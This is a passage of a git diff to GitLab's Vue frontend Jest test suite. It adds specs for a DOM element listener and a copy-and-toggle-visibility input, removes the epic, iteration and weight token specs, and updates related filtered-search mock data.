expect(wrapper.emitted('alertDismissed')).toBeTruthy(); + }); }); }); diff --git a/spec/frontend/vue_shared/components/dom_element_listener_spec.js b/spec/frontend/vue_shared/components/dom_element_listener_spec.js new file mode 100644 index 00000000000..a848c34b7ce --- /dev/null +++ b/spec/frontend/vue_shared/components/dom_element_listener_spec.js @@ -0,0 +1,116 @@ +import { mount } from '@vue/test-utils'; +import { setHTMLFixture } from 'helpers/fixtures'; +import DomElementListener 
from '~/vue_shared/components/dom_element_listener.vue'; + +const DEFAULT_SLOT_CONTENT = 'Default slot content'; +const SELECTOR = '.js-test-include'; +const HTML = ` +<div> + <button class="js-test-include" data-testid="lorem">Lorem</button> + <button class="js-test-include" data-testid="ipsum">Ipsum</button> + <button data-testid="hello">Hello</a> +</div> +`; + +describe('~/vue_shared/components/dom_element_listener.vue', () => { + let wrapper; + let spies; + + const createComponent = () => { + wrapper = mount(DomElementListener, { + propsData: { + selector: SELECTOR, + }, + listeners: spies, + slots: { + default: DEFAULT_SLOT_CONTENT, + }, + }); + }; + + const findElement = (testId) => document.querySelector(`[data-testid="${testId}"]`); + const spiesCallCount = () => + Object.values(spies) + .map((x) => x.mock.calls.length) + .reduce((a, b) => a + b); + + beforeEach(() => { + setHTMLFixture(HTML); + spies = { + click: jest.fn(), + focus: jest.fn(), + }; + }); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('default', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders default slot', () => { + expect(wrapper.text()).toBe(DEFAULT_SLOT_CONTENT); + }); + + it('does not initially trigger listeners', () => { + expect(spiesCallCount()).toBe(0); + }); + + describe.each` + event | testId + ${'click'} | ${'lorem'} + ${'focus'} | ${'ipsum'} + `( + 'when matching element triggers event (testId=$testId, event=$event)', + ({ event, testId }) => { + beforeEach(() => { + findElement(testId).dispatchEvent(new Event(event)); + }); + + it('triggers listener', () => { + expect(spiesCallCount()).toBe(1); + expect(spies[event]).toHaveBeenCalledWith(expect.any(Event)); + expect(spies[event]).toHaveBeenCalledWith( + expect.objectContaining({ + target: findElement(testId), + }), + ); + }); + }, + ); + + describe.each` + desc | event | testId + ${'when non-matching element triggers event'} | ${'click'} | ${'hello'} + ${'when matching element triggers 
unlistened event'} | ${'hover'} | ${'lorem'} + `('$desc', ({ event, testId }) => { + beforeEach(() => { + findElement(testId).dispatchEvent(new Event(event)); + }); + + it('does not trigger listeners', () => { + expect(spiesCallCount()).toBe(0); + }); + }); + }); + + describe('after destroyed', () => { + beforeEach(() => { + createComponent(); + wrapper.destroy(); + }); + + describe('when matching element triggers event', () => { + beforeEach(() => { + findElement('lorem').dispatchEvent(new Event('click')); + }); + + it('does not trigger any listeners', () => { + expect(spiesCallCount()).toBe(0); + }); + }); + }); +}); diff --git a/spec/frontend/vue_shared/components/file_icon_spec.js b/spec/frontend/vue_shared/components/file_icon_spec.js index c10663f6c14..b0e623520a8 100644 --- a/spec/frontend/vue_shared/components/file_icon_spec.js +++ b/spec/frontend/vue_shared/components/file_icon_spec.js @@ -34,7 +34,7 @@ describe('File Icon component', () => { it.each` fileName | iconName - ${'test.js'} | ${'javascript'} + ${'index.js'} | ${'javascript'} ${'test.png'} | ${'image'} ${'test.PNG'} | ${'image'} ${'.npmrc'} | ${'npm'} diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/mock_data.js b/spec/frontend/vue_shared/components/filtered_search_bar/mock_data.js index 238c5d16db5..e3e2ef5610d 100644 --- a/spec/frontend/vue_shared/components/filtered_search_bar/mock_data.js +++ b/spec/frontend/vue_shared/components/filtered_search_bar/mock_data.js @@ -5,12 +5,9 @@ import { OPERATOR_IS_ONLY } from '~/vue_shared/components/filtered_search_bar/co import AuthorToken from '~/vue_shared/components/filtered_search_bar/tokens/author_token.vue'; import BranchToken from '~/vue_shared/components/filtered_search_bar/tokens/branch_token.vue'; import EmojiToken from '~/vue_shared/components/filtered_search_bar/tokens/emoji_token.vue'; -import EpicToken from '~/vue_shared/components/filtered_search_bar/tokens/epic_token.vue'; -import IterationToken from 
'~/vue_shared/components/filtered_search_bar/tokens/iteration_token.vue'; import LabelToken from '~/vue_shared/components/filtered_search_bar/tokens/label_token.vue'; import MilestoneToken from '~/vue_shared/components/filtered_search_bar/tokens/milestone_token.vue'; import ReleaseToken from '~/vue_shared/components/filtered_search_bar/tokens/release_token.vue'; -import WeightToken from '~/vue_shared/components/filtered_search_bar/tokens/weight_token.vue'; export const mockAuthor1 = { id: 1, @@ -65,11 +62,6 @@ export const mockMilestones = [ mockEscapedMilestone, ]; -export const mockEpics = [ - { iid: 1, id: 1, title: 'Foo', group_full_path: 'gitlab-org' }, - { iid: 2, id: 2, title: 'Bar', group_full_path: 'gitlab-org/design' }, -]; - export const mockEmoji1 = { name: 'thumbsup', }; @@ -102,27 +94,6 @@ export const mockAuthorToken = { fetchAuthors: Api.projectUsers.bind(Api), }; -export const mockIterationToken = { - type: 'iteration', - icon: 'iteration', - title: 'Iteration', - unique: true, - token: IterationToken, - fetchIterations: () => Promise.resolve(), -}; - -export const mockIterations = [ - { - id: 1, - title: 'Iteration 1', - startDate: '2021-11-05', - dueDate: '2021-11-10', - iterationCadence: { - title: 'Cadence 1', - }, - }, -]; - export const mockLabelToken = { type: 'label_name', icon: 'labels', @@ -153,73 +124,6 @@ export const mockReleaseToken = { fetchReleases: () => Promise.resolve(), }; -export const mockEpicToken = { - type: 'epic_iid', - icon: 'clock', - title: 'Epic', - unique: true, - symbol: '&', - token: EpicToken, - operators: OPERATOR_IS_ONLY, - idProperty: 'iid', - fullPath: 'gitlab-org', -}; - -export const mockEpicNode1 = { - __typename: 'Epic', - parent: null, - id: 'gid://gitlab/Epic/40', - iid: '2', - title: 'Marketing epic', - description: 'Mock epic description', - state: 'opened', - startDate: '2017-12-25', - dueDate: '2018-02-15', - webUrl: 'http://gdk.test:3000/groups/gitlab-org/marketing/-/epics/1', - hasChildren: false, - 
hasParent: false, - confidential: false, -}; - -export const mockEpicNode2 = { - __typename: 'Epic', - parent: null, - id: 'gid://gitlab/Epic/41', - iid: '3', - title: 'Another marketing', - startDate: '2017-12-26', - dueDate: '2018-03-10', - state: 'opened', - webUrl: 'http://gdk.test:3000/groups/gitlab-org/marketing/-/epics/2', -}; - -export const mockGroupEpicsQueryResponse = { - data: { - group: { - id: 'gid://gitlab/Group/1', - name: 'Gitlab Org', - epics: { - edges: [ - { - node: { - ...mockEpicNode1, - }, - __typename: 'EpicEdge', - }, - { - node: { - ...mockEpicNode2, - }, - __typename: 'EpicEdge', - }, - ], - __typename: 'EpicConnection', - }, - __typename: 'Group', - }, - }, -}; - export const mockReactionEmojiToken = { type: 'my_reaction_emoji', icon: 'thumb-up', @@ -243,14 +147,6 @@ export const mockMembershipToken = { ], }; -export const mockWeightToken = { - type: 'weight', - icon: 'weight', - title: 'Weight', - unique: true, - token: WeightToken, -}; - export const mockMembershipTokenOptionsWithoutTitles = { ...mockMembershipToken, options: [{ value: 'exclude' }, { value: 'only' }], diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/base_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/base_token_spec.js index f9ce0338d2f..84f0151d9db 100644 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/base_token_spec.js +++ b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/base_token_spec.js @@ -14,7 +14,13 @@ import BaseToken from '~/vue_shared/components/filtered_search_bar/tokens/base_t import { mockLabelToken } from '../mock_data'; -jest.mock('~/vue_shared/components/filtered_search_bar/filtered_search_utils'); +jest.mock('~/vue_shared/components/filtered_search_bar/filtered_search_utils', () => ({ + getRecentlyUsedSuggestions: jest.fn(), + setTokenValueToRecentlyUsed: jest.fn(), + stripQuotes: jest.requireActual( + 
'~/vue_shared/components/filtered_search_bar/filtered_search_utils', + ).stripQuotes, +})); const mockStorageKey = 'recent-tokens-label_name'; @@ -46,13 +52,13 @@ const defaultSlots = { }; const mockProps = { - config: mockLabelToken, + config: { ...mockLabelToken, recentSuggestionsStorageKey: mockStorageKey }, value: { data: '' }, active: false, suggestions: [], suggestionsLoading: false, defaultSuggestions: DEFAULT_NONE_ANY, - recentSuggestionsStorageKey: mockStorageKey, + getActiveTokenValue: (labels, data) => labels.find((label) => label.title === data), }; function createComponent({ @@ -152,30 +158,22 @@ describe('BaseToken', () => { describe('methods', () => { describe('handleTokenValueSelected', () => { - it('calls `setTokenValueToRecentlyUsed` when `recentSuggestionsStorageKey` is defined', () => { - const mockTokenValue = { - id: 1, - title: 'Foo', - }; + const mockTokenValue = mockLabels[0]; - wrapper.vm.handleTokenValueSelected(mockTokenValue); + it('calls `setTokenValueToRecentlyUsed` when `recentSuggestionsStorageKey` is defined', () => { + wrapper.vm.handleTokenValueSelected(mockTokenValue.title); expect(setTokenValueToRecentlyUsed).toHaveBeenCalledWith(mockStorageKey, mockTokenValue); }); it('does not add token from preloadedSuggestions', async () => { - const mockTokenValue = { - id: 1, - title: 'Foo', - }; - wrapper.setProps({ preloadedSuggestions: [mockTokenValue], }); await wrapper.vm.$nextTick(); - wrapper.vm.handleTokenValueSelected(mockTokenValue); + wrapper.vm.handleTokenValueSelected(mockTokenValue.title); expect(setTokenValueToRecentlyUsed).not.toHaveBeenCalled(); }); @@ -190,7 +188,7 @@ describe('BaseToken', () => { const glFilteredSearchToken = wrapperWithNoStubs.find(GlFilteredSearchToken); expect(glFilteredSearchToken.exists()).toBe(true); - expect(glFilteredSearchToken.props('config')).toBe(mockLabelToken); + expect(glFilteredSearchToken.props('config')).toEqual(mockProps.config); wrapperWithNoStubs.destroy(); }); @@ -239,6 +237,7 @@ 
describe('BaseToken', () => { stubs: { Portal: true }, }); }); + it('emits `fetch-suggestions` event on component after a delay when component emits `input` event', async () => { jest.useFakeTimers(); @@ -250,6 +249,32 @@ describe('BaseToken', () => { expect(wrapperWithNoStubs.emitted('fetch-suggestions')).toBeTruthy(); expect(wrapperWithNoStubs.emitted('fetch-suggestions')[2]).toEqual(['foo']); }); + + describe('when search is started with a quote', () => { + it('emits `fetch-suggestions` with filtered value', async () => { + jest.useFakeTimers(); + + wrapperWithNoStubs.find(GlFilteredSearchToken).vm.$emit('input', { data: '"foo' }); + await wrapperWithNoStubs.vm.$nextTick(); + + jest.runAllTimers(); + + expect(wrapperWithNoStubs.emitted('fetch-suggestions')[2]).toEqual(['foo']); + }); + }); + + describe('when search starts and ends with a quote', () => { + it('emits `fetch-suggestions` with filtered value', async () => { + jest.useFakeTimers(); + + wrapperWithNoStubs.find(GlFilteredSearchToken).vm.$emit('input', { data: '"foo"' }); + await wrapperWithNoStubs.vm.$nextTick(); + + jest.runAllTimers(); + + expect(wrapperWithNoStubs.emitted('fetch-suggestions')[2]).toEqual(['foo']); + }); + }); }); }); }); diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/epic_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/epic_token_spec.js deleted file mode 100644 index 6ee5d50d396..00000000000 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/epic_token_spec.js +++ /dev/null @@ -1,169 +0,0 @@ -import { GlFilteredSearchTokenSegment } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; -import MockAdapter from 'axios-mock-adapter'; -import Vue from 'vue'; -import VueApollo from 'vue-apollo'; -import createMockApollo from 'helpers/mock_apollo_helper'; -import waitForPromises from 'helpers/wait_for_promises'; -import createFlash from '~/flash'; -import axios from '~/lib/utils/axios_utils'; - -import 
searchEpicsQuery from '~/vue_shared/components/filtered_search_bar/queries/search_epics.query.graphql'; -import EpicToken from '~/vue_shared/components/filtered_search_bar/tokens/epic_token.vue'; -import BaseToken from '~/vue_shared/components/filtered_search_bar/tokens/base_token.vue'; - -import { mockEpicToken, mockEpics, mockGroupEpicsQueryResponse } from '../mock_data'; - -jest.mock('~/flash'); -Vue.use(VueApollo); - -const defaultStubs = { - Portal: true, - GlFilteredSearchSuggestionList: { - template: '<div></div>', - methods: { - getValue: () => '=', - }, - }, -}; - -describe('EpicToken', () => { - let mock; - let wrapper; - let fakeApollo; - - const findBaseToken = () => wrapper.findComponent(BaseToken); - - function createComponent( - options = {}, - epicsQueryHandler = jest.fn().mockResolvedValue(mockGroupEpicsQueryResponse), - ) { - fakeApollo = createMockApollo([[searchEpicsQuery, epicsQueryHandler]]); - const { - config = mockEpicToken, - value = { data: '' }, - active = false, - stubs = defaultStubs, - } = options; - return mount(EpicToken, { - apolloProvider: fakeApollo, - propsData: { - config, - value, - active, - }, - provide: { - portalName: 'fake target', - alignSuggestions: function fakeAlignSuggestions() {}, - suggestionsListClass: 'custom-class', - }, - stubs, - }); - } - - beforeEach(() => { - mock = new MockAdapter(axios); - wrapper = createComponent(); - }); - - afterEach(() => { - mock.restore(); - wrapper.destroy(); - }); - - describe('computed', () => { - beforeEach(async () => { - wrapper = createComponent({ - data: { - epics: mockEpics, - }, - }); - - await wrapper.vm.$nextTick(); - }); - }); - - describe('methods', () => { - describe('fetchEpicsBySearchTerm', () => { - it('calls fetchEpics with provided searchTerm param', () => { - jest.spyOn(wrapper.vm, 'fetchEpics'); - - findBaseToken().vm.$emit('fetch-suggestions', 'foo'); - - expect(wrapper.vm.fetchEpics).toHaveBeenCalledWith('foo'); - }); - - it('sets response to `epics` when 
request is successful', async () => { - jest.spyOn(wrapper.vm, 'fetchEpics').mockResolvedValue({ - data: mockEpics, - }); - - findBaseToken().vm.$emit('fetch-suggestions'); - - await waitForPromises(); - - expect(wrapper.vm.epics).toEqual(mockEpics); - }); - - it('calls `createFlash` with flash error message when request fails', async () => { - jest.spyOn(wrapper.vm, 'fetchEpics').mockRejectedValue({}); - - findBaseToken().vm.$emit('fetch-suggestions', 'foo'); - - await waitForPromises(); - - expect(createFlash).toHaveBeenCalledWith({ - message: 'There was a problem fetching epics.', - }); - }); - - it('sets `loading` to false when request completes', async () => { - jest.spyOn(wrapper.vm, 'fetchEpics').mockRejectedValue({}); - - findBaseToken().vm.$emit('fetch-suggestions', 'foo'); - - await waitForPromises(); - - expect(wrapper.vm.loading).toBe(false); - }); - }); - }); - - describe('template', () => { - const getTokenValueEl = () => wrapper.findAllComponents(GlFilteredSearchTokenSegment).at(2); - - beforeEach(async () => { - wrapper = createComponent({ - value: { data: `${mockEpics[0].title}::&${mockEpics[0].iid}` }, - data: { epics: mockEpics }, - }); - - await wrapper.vm.$nextTick(); - }); - - it('renders BaseToken component', () => { - expect(findBaseToken().exists()).toBe(true); - }); - - it('renders token item when value is selected', () => { - const tokenSegments = wrapper.findAll(GlFilteredSearchTokenSegment); - - expect(tokenSegments).toHaveLength(3); - expect(tokenSegments.at(2).text()).toBe(`${mockEpics[0].title}::&${mockEpics[0].iid}`); - }); - - it.each` - value | valueType | tokenValueString - ${`${mockEpics[0].title}::&${mockEpics[0].iid}`} | ${'string'} | ${`${mockEpics[0].title}::&${mockEpics[0].iid}`} - ${`${mockEpics[1].title}::&${mockEpics[1].iid}`} | ${'number'} | ${`${mockEpics[1].title}::&${mockEpics[1].iid}`} - `('renders token item when selection is a $valueType', async ({ value, tokenValueString }) => { - wrapper.setProps({ - value: { 
data: value }, - }); - - await wrapper.vm.$nextTick(); - - expect(getTokenValueEl().text()).toBe(tokenValueString); - }); - }); -}); diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/iteration_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/iteration_token_spec.js deleted file mode 100644 index 44bc16adb97..00000000000 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/iteration_token_spec.js +++ /dev/null @@ -1,116 +0,0 @@ -import { - GlFilteredSearchToken, - GlFilteredSearchTokenSegment, - GlFilteredSearchSuggestion, -} from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; -import waitForPromises from 'helpers/wait_for_promises'; -import createFlash from '~/flash'; -import IterationToken from '~/vue_shared/components/filtered_search_bar/tokens/iteration_token.vue'; -import { mockIterationToken, mockIterations } from '../mock_data'; - -jest.mock('~/flash'); - -describe('IterationToken', () => { - const id = 123; - let wrapper; - - const createComponent = ({ - config = mockIterationToken, - value = { data: '' }, - active = false, - stubs = {}, - provide = {}, - } = {}) => - mount(IterationToken, { - propsData: { - active, - config, - value, - }, - provide: { - portalName: 'fake target', - alignSuggestions: function fakeAlignSuggestions() {}, - suggestionsListClass: () => 'custom-class', - ...provide, - }, - stubs, - }); - - afterEach(() => { - wrapper.destroy(); - }); - - describe('when iteration cadence feature is available', () => { - beforeEach(async () => { - wrapper = createComponent({ - active: true, - config: { ...mockIterationToken, initialIterations: mockIterations }, - value: { data: 'i' }, - stubs: { Portal: true }, - provide: { - glFeatures: { - iterationCadences: true, - }, - }, - }); - - await wrapper.setData({ loading: false }); - }); - - it('renders iteration start date and due date', () => { - const suggestions = wrapper.findAll(GlFilteredSearchSuggestion); - - 
expect(suggestions.at(3).text()).toContain('Nov 5, 2021 - Nov 10, 2021'); - }); - }); - - it('renders iteration value', async () => { - wrapper = createComponent({ value: { data: id } }); - - await wrapper.vm.$nextTick(); - - const tokenSegments = wrapper.findAllComponents(GlFilteredSearchTokenSegment); - - expect(tokenSegments).toHaveLength(3); // `Iteration` `=` `gitlab-org: #1` - expect(tokenSegments.at(2).text()).toBe(id.toString()); - }); - - it('fetches initial values', () => { - const fetchIterationsSpy = jest.fn().mockResolvedValue(); - - wrapper = createComponent({ - config: { ...mockIterationToken, fetchIterations: fetchIterationsSpy }, - value: { data: id }, - }); - - expect(fetchIterationsSpy).toHaveBeenCalledWith(id); - }); - - it('fetches iterations on user input', () => { - const search = 'hello'; - const fetchIterationsSpy = jest.fn().mockResolvedValue(); - - wrapper = createComponent({ - config: { ...mockIterationToken, fetchIterations: fetchIterationsSpy }, - }); - - wrapper.findComponent(GlFilteredSearchToken).vm.$emit('input', { data: search }); - - expect(fetchIterationsSpy).toHaveBeenCalledWith(search); - }); - - it('renders error message when request fails', async () => { - const fetchIterationsSpy = jest.fn().mockRejectedValue(); - - wrapper = createComponent({ - config: { ...mockIterationToken, fetchIterations: fetchIterationsSpy }, - }); - - await waitForPromises(); - - expect(createFlash).toHaveBeenCalledWith({ - message: 'There was a problem fetching iterations.', - }); - }); -}); diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/milestone_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/milestone_token_spec.js index 936841651d1..4a098db33c5 100644 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/milestone_token_spec.js +++ b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/milestone_token_spec.js @@ -9,18 +9,15 @@ import MockAdapter from 
'axios-mock-adapter'; import waitForPromises from 'helpers/wait_for_promises'; import createFlash from '~/flash'; import axios from '~/lib/utils/axios_utils'; -import { sortMilestonesByDueDate } from '~/milestones/milestone_utils'; +import { sortMilestonesByDueDate } from '~/milestones/utils'; -import { - DEFAULT_MILESTONES, - DEFAULT_MILESTONES_GRAPHQL, -} from '~/vue_shared/components/filtered_search_bar/constants'; +import { DEFAULT_MILESTONES } from '~/vue_shared/components/filtered_search_bar/constants'; import MilestoneToken from '~/vue_shared/components/filtered_search_bar/tokens/milestone_token.vue'; import { mockMilestoneToken, mockMilestones, mockRegularMilestone } from '../mock_data'; jest.mock('~/flash'); -jest.mock('~/milestones/milestone_utils'); +jest.mock('~/milestones/utils'); const defaultStubs = { Portal: true, @@ -199,12 +196,12 @@ describe('MilestoneToken', () => { beforeEach(() => { wrapper = createComponent({ active: true, - config: { ...mockMilestoneToken, defaultMilestones: DEFAULT_MILESTONES_GRAPHQL }, + config: { ...mockMilestoneToken, defaultMilestones: DEFAULT_MILESTONES }, }); }); it('finds the correct value from the activeToken', () => { - DEFAULT_MILESTONES_GRAPHQL.forEach(({ value, title }) => { + DEFAULT_MILESTONES.forEach(({ value, title }) => { const activeToken = wrapper.vm.getActiveMilestone([], value); expect(activeToken.title).toEqual(title); diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/release_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/release_token_spec.js index b804ff97b82..b2f246a5985 100644 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/release_token_spec.js +++ b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/release_token_spec.js @@ -8,7 +8,7 @@ import { mockReleaseToken } from '../mock_data'; jest.mock('~/flash'); describe('ReleaseToken', () => { - const id = 123; + const id = '123'; let wrapper; const 
createComponent = ({ config = mockReleaseToken, value = { data: '' } } = {}) => diff --git a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/weight_token_spec.js b/spec/frontend/vue_shared/components/filtered_search_bar/tokens/weight_token_spec.js deleted file mode 100644 index 4277899f8db..00000000000 --- a/spec/frontend/vue_shared/components/filtered_search_bar/tokens/weight_token_spec.js +++ /dev/null @@ -1,38 +0,0 @@ -import { GlFilteredSearchTokenSegment } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; -import WeightToken from '~/vue_shared/components/filtered_search_bar/tokens/weight_token.vue'; -import { mockWeightToken } from '../mock_data'; - -jest.mock('~/flash'); - -describe('WeightToken', () => { - const weight = '3'; - let wrapper; - - const createComponent = ({ config = mockWeightToken, value = { data: '' } } = {}) => - mount(WeightToken, { - propsData: { - active: false, - config, - value, - }, - provide: { - portalName: 'fake target', - alignSuggestions: function fakeAlignSuggestions() {}, - suggestionsListClass: () => 'custom-class', - }, - }); - - afterEach(() => { - wrapper.destroy(); - }); - - it('renders weight value', () => { - wrapper = createComponent({ value: { data: weight } }); - - const tokenSegments = wrapper.findAllComponents(GlFilteredSearchTokenSegment); - - expect(tokenSegments).toHaveLength(3); // `Weight` `=` `3` - expect(tokenSegments.at(2).text()).toBe(weight); - }); -}); diff --git a/spec/frontend/vue_shared/components/form/__snapshots__/title_spec.js.snap b/spec/frontend/vue_shared/components/form/__snapshots__/title_spec.js.snap index ff1dad2de68..58ad1f681bc 100644 --- a/spec/frontend/vue_shared/components/form/__snapshots__/title_spec.js.snap +++ b/spec/frontend/vue_shared/components/form/__snapshots__/title_spec.js.snap @@ -5,6 +5,7 @@ exports[`Title edit field matches the snapshot 1`] = ` label="Title" label-for="title-field-edit" labeldescription="" + optionaltext="(optional)" > 
<gl-form-input-stub /> </gl-form-group-stub> diff --git a/spec/frontend/vue_shared/components/form/input_copy_toggle_visibility_spec.js b/spec/frontend/vue_shared/components/form/input_copy_toggle_visibility_spec.js new file mode 100644 index 00000000000..b67385cc43e --- /dev/null +++ b/spec/frontend/vue_shared/components/form/input_copy_toggle_visibility_spec.js @@ -0,0 +1,231 @@ +import { merge } from 'lodash'; +import { GlFormInputGroup } from '@gitlab/ui'; + +import InputCopyToggleVisibility from '~/vue_shared/components/form/input_copy_toggle_visibility.vue'; +import ClipboardButton from '~/vue_shared/components/clipboard_button.vue'; +import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; + +import { mountExtended } from 'helpers/vue_test_utils_helper'; + +describe('InputCopyToggleVisibility', () => { + let wrapper; + + afterEach(() => { + wrapper.destroy(); + }); + + const valueProp = 'hR8x1fuJbzwu5uFKLf9e'; + + const createComponent = (options = {}) => { + wrapper = mountExtended( + InputCopyToggleVisibility, + merge({}, options, { + directives: { + GlTooltip: createMockDirective(), + }, + }), + ); + }; + + const findFormInputGroup = () => wrapper.findComponent(GlFormInputGroup); + const findFormInput = () => findFormInputGroup().find('input'); + const findRevealButton = () => + wrapper.findByRole('button', { + name: InputCopyToggleVisibility.i18n.toggleVisibilityLabelReveal, + }); + const findHideButton = () => + wrapper.findByRole('button', { + name: InputCopyToggleVisibility.i18n.toggleVisibilityLabelHide, + }); + const findCopyButton = () => wrapper.findComponent(ClipboardButton); + const createCopyEvent = () => { + const event = new Event('copy', { cancelable: true }); + Object.assign(event, { preventDefault: jest.fn(), clipboardData: { setData: jest.fn() } }); + + return event; + }; + + const itDoesNotModifyCopyEvent = () => { + it('does not modify copy event', () => { + const event = createCopyEvent(); + + 
findFormInput().element.dispatchEvent(event); + + expect(event.clipboardData.setData).not.toHaveBeenCalled(); + expect(event.preventDefault).not.toHaveBeenCalled(); + }); + }; + + describe('when `value` prop is passed', () => { + beforeEach(() => { + createComponent({ + propsData: { + value: valueProp, + }, + }); + }); + + it('displays value as hidden', () => { + expect(findFormInputGroup().props('value')).toBe('********************'); + }); + + it('saves actual value to clipboard when manually copied', () => { + const event = createCopyEvent(); + findFormInput().element.dispatchEvent(event); + + expect(event.clipboardData.setData).toHaveBeenCalledWith('text/plain', valueProp); + expect(event.preventDefault).toHaveBeenCalled(); + }); + + describe('visibility toggle button', () => { + it('renders a reveal button', () => { + const revealButton = findRevealButton(); + + expect(revealButton.exists()).toBe(true); + + const tooltip = getBinding(revealButton.element, 'gl-tooltip'); + + expect(tooltip.value).toBe(InputCopyToggleVisibility.i18n.toggleVisibilityLabelReveal); + }); + + describe('when clicked', () => { + beforeEach(async () => { + await findRevealButton().trigger('click'); + }); + + it('displays value', () => { + expect(findFormInputGroup().props('value')).toBe(valueProp); + }); + + it('renders a hide button', () => { + const hideButton = findHideButton(); + + expect(hideButton.exists()).toBe(true); + + const tooltip = getBinding(hideButton.element, 'gl-tooltip'); + + expect(tooltip.value).toBe(InputCopyToggleVisibility.i18n.toggleVisibilityLabelHide); + }); + + it('emits `visibility-change` event', () => { + expect(wrapper.emitted('visibility-change')[0]).toEqual([true]); + }); + }); + }); + + describe('copy button', () => { + it('renders button with correct props passed', () => { + expect(findCopyButton().props()).toMatchObject({ + text: valueProp, + title: 'Copy', + }); + }); + + describe('when clicked', () => { + beforeEach(async () => { + await 
findCopyButton().trigger('click'); + }); + + it('emits `copy` event', () => { + expect(wrapper.emitted('copy')[0]).toEqual([]); + }); + }); + }); + }); + + describe('when `value` prop is not passed', () => { + beforeEach(() => { + createComponent(); + }); + + it('displays value as hidden with 20 asterisks', () => { + expect(findFormInputGroup().props('value')).toBe('********************'); + }); + }); + + describe('when `initialVisibility` prop is `true`', () => { + beforeEach(() => { + createComponent({ + propsData: { + value: valueProp, + initialVisibility: true, + }, + }); + }); + + it('displays value', () => { + expect(findFormInputGroup().props('value')).toBe(valueProp); + }); + + itDoesNotModifyCopyEvent(); + }); + + describe('when `showToggleVisibilityButton` is `false`', () => { + beforeEach(() => { + createComponent({ + propsData: { + value: valueProp, + showToggleVisibilityButton: false, + }, + }); + }); + + it('does not render visibility toggle button', () => { + expect(findRevealButton().exists()).toBe(false); + expect(findHideButton().exists()).toBe(false); + }); + + it('displays value', () => { + expect(findFormInputGroup().props('value')).toBe(valueProp); + }); + + itDoesNotModifyCopyEvent(); + }); + + describe('when `showCopyButton` is `false`', () => { + beforeEach(() => { + createComponent({ + propsData: { + showCopyButton: false, + }, + }); + }); + + it('does not render copy button', () => { + expect(findCopyButton().exists()).toBe(false); + }); + }); + + it('passes `formInputGroupProps` prop to `GlFormInputGroup`', () => { + createComponent({ + propsData: { + formInputGroupProps: { + label: 'Foo bar', + }, + }, + }); + + expect(findFormInputGroup().props('label')).toBe('Foo bar'); + }); + + it('passes `copyButtonTitle` prop to `ClipboardButton`', () => { + createComponent({ + propsData: { + copyButtonTitle: 'Copy token', + }, + }); + + expect(findCopyButton().props('title')).toBe('Copy token'); + }); + + it('renders slots in `gl-form-group`', () 
=> { + const description = 'Mock input description'; + createComponent({ + slots: { + description, + }, + }); + + expect(wrapper.findByText(description).exists()).toBe(true); + }); +}); diff --git a/spec/frontend/vue_shared/components/gl_modal_vuex_spec.js b/spec/frontend/vue_shared/components/gl_modal_vuex_spec.js index 390a70792f3..b837a998cd6 100644 --- a/spec/frontend/vue_shared/components/gl_modal_vuex_spec.js +++ b/spec/frontend/vue_shared/components/gl_modal_vuex_spec.js @@ -1,12 +1,12 @@ import { GlModal } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { BV_SHOW_MODAL, BV_HIDE_MODAL } from '~/lib/utils/constants'; import GlModalVuex from '~/vue_shared/components/gl_modal_vuex.vue'; import createState from '~/vuex_shared/modules/modal/state'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); const TEST_SLOT = 'Lorem ipsum modal dolar sit.'; const TEST_MODAL_ID = 'my-modal-id'; @@ -36,7 +36,6 @@ describe('GlModalVuex', () => { wrapper = shallowMount(GlModalVuex, { ...options, - localVue, store, propsData, stubs: { diff --git a/spec/frontend/vue_shared/components/header_ci_component_spec.js b/spec/frontend/vue_shared/components/header_ci_component_spec.js index b76f475a6fb..aea76f164f0 100644 --- a/spec/frontend/vue_shared/components/header_ci_component_spec.js +++ b/spec/frontend/vue_shared/components/header_ci_component_spec.js @@ -1,4 +1,4 @@ -import { GlButton, GlAvatarLink } from '@gitlab/ui'; +import { GlButton, GlAvatarLink, GlTooltip } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import CiIconBadge from '~/vue_shared/components/ci_badge_link.vue'; @@ -32,6 +32,7 @@ describe('Header CI Component', () => { const findTimeAgo = () => wrapper.findComponent(TimeagoTooltip); const findUserLink = () => 
